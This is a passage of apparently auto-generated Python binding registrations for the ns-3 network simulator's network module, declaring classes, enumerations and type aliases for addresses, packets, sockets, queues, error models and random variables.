root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address'])
## mac64-address.h (module 'network'): ns3::Mac64Address [class]
module.add_class('Mac64Address')
## mac64-address.h (module 'network'): ns3::Mac64Address [class]
root_module['ns3::Mac64Address'].implicitly_converts_to(root_module['ns3::Address'])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer [class]
module.add_class('NetDeviceContainer')
## node-container.h (module 'network'): ns3::NodeContainer [class]
module.add_class('NodeContainer')
## node-list.h (module 'network'): ns3::NodeList [class]
module.add_class('NodeList')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', outer_class=root_module['ns3::PacketMetadata'])
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress [class]
module.add_class('PacketSocketAddress')
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress [class]
root_module['ns3::PacketSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper [class]
module.add_class('PacketSocketHelper')
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', outer_class=root_module['ns3::PacketTagList'])
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock [class]
module.add_class('PbbAddressTlvBlock')
## packetbb.h (module 'network'): ns3::PbbTlvBlock [class]
module.add_class('PbbTlvBlock')
## pcap-file.h (module 'network'): ns3::PcapFile [class]
module.add_class('PcapFile')
## trace-helper.h (module 'network'): ns3::PcapHelper [class]
module.add_class('PcapHelper')
## trace-helper.h (module 'network'): ns3::PcapHelper [enumeration]
module.add_enum('', ['DLT_NULL', 'DLT_EN10MB', 'DLT_PPP', 'DLT_RAW', 'DLT_IEEE802_11', 'DLT_PRISM_HEADER', 'DLT_IEEE802_11_RADIO'], outer_class=root_module['ns3::PcapHelper'])
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice [class]
module.add_class('PcapHelperForDevice', allow_subclassing=True)
## random-variable.h (module 'core'): ns3::RandomVariable [class]
module.add_class('RandomVariable', import_from_module='ns.core')
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager [class]
module.add_class('RngSeedManager', import_from_module='ns.core')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int> [class]
module.add_class('SequenceNumber32')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short> [class]
module.add_class('SequenceNumber16')
## random-variable.h (module 'core'): ns3::SequentialVariable [class]
module.add_class('SequentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs [class]
module.add_class('SystemWallClockMs', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer')
## random-variable.h (module 'core'): ns3::TriangularVariable [class]
module.add_class('TriangularVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## random-variable.h (module 'core'): ns3::UniformVariable [class]
module.add_class('UniformVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::WeibullVariable [class]
module.add_class('WeibullVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZetaVariable [class]
module.add_class('ZetaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZipfVariable [class]
module.add_class('ZipfVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', parent=root_module['ns3::ObjectBase'])
## random-variable.h (module 'core'): ns3::ConstantVariable [class]
module.add_class('ConstantVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::DeterministicVariable [class]
module.add_class('DeterministicVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::EmpiricalVariable [class]
module.add_class('EmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ErlangVariable [class]
module.add_class('ErlangVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ExponentialVariable [class]
module.add_class('ExponentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag [class]
module.add_class('FlowIdTag', parent=root_module['ns3::Tag'])
## random-variable.h (module 'core'): ns3::GammaVariable [class]
module.add_class('GammaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', parent=root_module['ns3::Chunk'])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable [class]
module.add_class('IntEmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::EmpiricalVariable'])
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader [class]
module.add_class('LlcSnapHeader', parent=root_module['ns3::Header'])
## random-variable.h (module 'core'): ns3::LogNormalVariable [class]
module.add_class('LogNormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::NormalVariable [class]
module.add_class('NormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## packet-burst.h (module 'network'): ns3::PacketBurst [class]
module.add_class('PacketBurst', parent=root_module['ns3::Object'])
## random-variable.h (module 'core'): ns3::ParetoVariable [class]
module.add_class('ParetoVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## pcap-file-wrapper.h (module 'network'): ns3::PcapFileWrapper [class]
module.add_class('PcapFileWrapper', parent=root_module['ns3::Object'])
## queue.h (module 'network'): ns3::Queue [class]
module.add_class('Queue', parent=root_module['ns3::Object'])
## queue.h (module 'network'): ns3::Queue::QueueMode [enumeration]
module.add_enum('QueueMode', ['QUEUE_MODE_PACKETS', 'QUEUE_MODE_BYTES'], outer_class=root_module['ns3::Queue'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [class]
module.add_class('RadiotapHeader', parent=root_module['ns3::Header'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [enumeration]
module.add_enum('', ['FRAME_FLAG_NONE', 'FRAME_FLAG_CFP', 'FRAME_FLAG_SHORT_PREAMBLE', 'FRAME_FLAG_WEP', 'FRAME_FLAG_FRAGMENTED', 'FRAME_FLAG_FCS_INCLUDED', 'FRAME_FLAG_DATA_PADDING', 'FRAME_FLAG_BAD_FCS', 'FRAME_FLAG_SHORT_GUARD'], outer_class=root_module['ns3::RadiotapHeader'])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader [enumeration]
module.add_enum('', ['CHANNEL_FLAG_NONE', 'CHANNEL_FLAG_TURBO', 'CHANNEL_FLAG_CCK', 'CHANNEL_FLAG_OFDM', 'CHANNEL_FLAG_SPECTRUM_2GHZ', 'CHANNEL_FLAG_SPECTRUM_5GHZ', 'CHANNEL_FLAG_PASSIVE', 'CHANNEL_FLAG_DYNAMIC', 'CHANNEL_FLAG_GFSK'], outer_class=root_module['ns3::RadiotapHeader'])
## red-queue.h (module 'network'): ns3::RedQueue [class]
module.add_class('RedQueue', parent=root_module['ns3::Queue'])
## red-queue.h (module 'network'): ns3::RedQueue [enumeration]
module.add_enum('', ['DTYPE_NONE', 'DTYPE_FORCED', 'DTYPE_UNFORCED'], outer_class=root_module['ns3::RedQueue'])
## red-queue.h (module 'network'): ns3::RedQueue::Stats [struct]
module.add_class('Stats', outer_class=root_module['ns3::RedQueue'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbAddressBlock', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbAddressBlock>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbMessage', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbMessage>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbPacket', 'ns3::Header', 'ns3::DefaultDeleter<ns3::PbbPacket>'], parent=root_module['ns3::Header'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, template_parameters=['ns3::PbbTlv', 'ns3::empty', 'ns3::DefaultDeleter<ns3::PbbTlv>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## socket.h (module 'network'): ns3::Socket [class]
module.add_class('Socket', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'])
## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'])
## socket.h (module 'network'): ns3::SocketAddressTag [class]
module.add_class('SocketAddressTag', parent=root_module['ns3::Tag'])
## socket-factory.h (module 'network'): ns3::SocketFactory [class]
module.add_class('SocketFactory', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
module.add_class('SocketIpTtlTag', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
module.add_class('SocketSetDontFragmentTag', parent=root_module['ns3::Tag'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', parent=root_module['ns3::Chunk'])
## application.h (module 'network'): ns3::Application [class]
module.add_class('Application', parent=root_module['ns3::Object'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## boolean.h (module 'core'): ns3::BooleanChecker [class]
module.add_class('BooleanChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## boolean.h (module 'core'): ns3::BooleanValue [class]
module.add_class('BooleanValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## channel.h (module 'network'): ns3::Channel [class]
module.add_class('Channel', parent=root_module['ns3::Object'])
## data-rate.h (module 'network'): ns3::DataRateChecker [class]
module.add_class('DataRateChecker', parent=root_module['ns3::AttributeChecker'])
## data-rate.h (module 'network'): ns3::DataRateValue [class]
module.add_class('DataRateValue', parent=root_module['ns3::AttributeValue'])
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue [class]
module.add_class('DropTailQueue', parent=root_module['ns3::Queue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::ErrorModel [class]
module.add_class('ErrorModel', parent=root_module['ns3::Object'])
## ethernet-header.h (module 'network'): ns3::EthernetHeader [class]
module.add_class('EthernetHeader', parent=root_module['ns3::Header'])
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer [class]
module.add_class('EthernetTrailer', parent=root_module['ns3::Trailer'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::ListErrorModel [class]
module.add_class('ListErrorModel', parent=root_module['ns3::ErrorModel'])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class]
module.add_class('Mac48AddressChecker', parent=root_module['ns3::AttributeChecker'])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class]
module.add_class('Mac48AddressValue', parent=root_module['ns3::AttributeValue'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'])
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
module.add_class('Node', parent=root_module['ns3::Object'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
module.add_class('OutputStreamWrapper', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## packet-socket.h (module 'network'): ns3::PacketSocket [class]
module.add_class('PacketSocket', parent=root_module['ns3::Socket'])
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory [class]
module.add_class('PacketSocketFactory', parent=root_module['ns3::SocketFactory'])
## packetbb.h (module 'network'): ns3::PbbAddressBlock [class]
module.add_class('PbbAddressBlock', parent=root_module['ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >'])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4 [class]
module.add_class('PbbAddressBlockIpv4', parent=root_module['ns3::PbbAddressBlock'])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6 [class]
module.add_class('PbbAddressBlockIpv6', parent=root_module['ns3::PbbAddressBlock'])
## packetbb.h (module 'network'): ns3::PbbMessage [class]
module.add_class('PbbMessage', parent=root_module['ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >'])
## packetbb.h (module 'network'): ns3::PbbMessageIpv4 [class]
module.add_class('PbbMessageIpv4', parent=root_module['ns3::PbbMessage'])
## packetbb.h (module 'network'): ns3::PbbMessageIpv6 [class]
module.add_class('PbbMessageIpv6', parent=root_module['ns3::PbbMessage'])
## packetbb.h (module 'network'): ns3::PbbPacket [class]
module.add_class('PbbPacket', parent=root_module['ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >'])
## packetbb.h (module 'network'): ns3::PbbTlv [class]
module.add_class('PbbTlv', parent=root_module['ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >'])
## random-variable.h (module 'core'): ns3::RandomVariableChecker [class]
module.add_class('RandomVariableChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## random-variable.h (module 'core'): ns3::RandomVariableValue [class]
module.add_class('RandomVariableValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::RateErrorModel [class]
module.add_class('RateErrorModel', parent=root_module['ns3::ErrorModel'])
## error-model.h (module 'network'): ns3::RateErrorModel::ErrorUnit [enumeration]
module.add_enum('ErrorUnit', ['ERROR_UNIT_BIT', 'ERROR_UNIT_BYTE', 'ERROR_UNIT_PACKET'], outer_class=root_module['ns3::RateErrorModel'])
## error-model.h (module 'network'): ns3::ReceiveListErrorModel [class]
module.add_class('ReceiveListErrorModel', parent=root_module['ns3::ErrorModel'])
## simple-channel.h (module 'network'): ns3::SimpleChannel [class]
module.add_class('SimpleChannel', parent=root_module['ns3::Channel'])
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice [class]
module.add_class('SimpleNetDevice', parent=root_module['ns3::NetDevice'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', parent=root_module['ns3::AttributeValue'])
## packetbb.h (module 'network'): ns3::PbbAddressTlv [class]
module.add_class('PbbAddressTlv', parent=root_module['ns3::PbbTlv'])
module.add_container('std::list< ns3::Ptr< ns3::Packet > >', 'ns3::Ptr< ns3::Packet >', container_type='list')
module.add_container('std::list< unsigned int >', 'unsigned int', container_type='list')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxEndOkCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxEndOkCallback*')
